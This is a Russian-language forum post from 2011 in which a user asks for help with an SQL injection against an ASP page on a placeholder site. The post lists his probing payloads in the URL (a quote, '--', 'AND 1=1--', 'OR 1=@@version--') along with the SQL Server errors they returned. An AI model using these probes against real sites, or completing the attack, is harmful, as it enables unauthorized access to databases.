30.07.2011, 00:38
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Слабо знаком с SQL-иньекциями в MSSQL.
http://www.site.com/internal.asp?ProdID=124335'
Сообщение от None
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
http://www.site.com/internal.asp?ProdID=124335--
Все в порядке, т.е. никаких кавычек и скобок закрывать не нужно, верно?
http://www.site.com/internal.asp?ProdID=124335+AND+1=1--
Сообщение от None
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'AND'.
http://www.site.com/internal.asp?ProdID=124335+OR+1=@@version--
Сообщение от None
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'OR'.
Что я делаю не так? |
|
|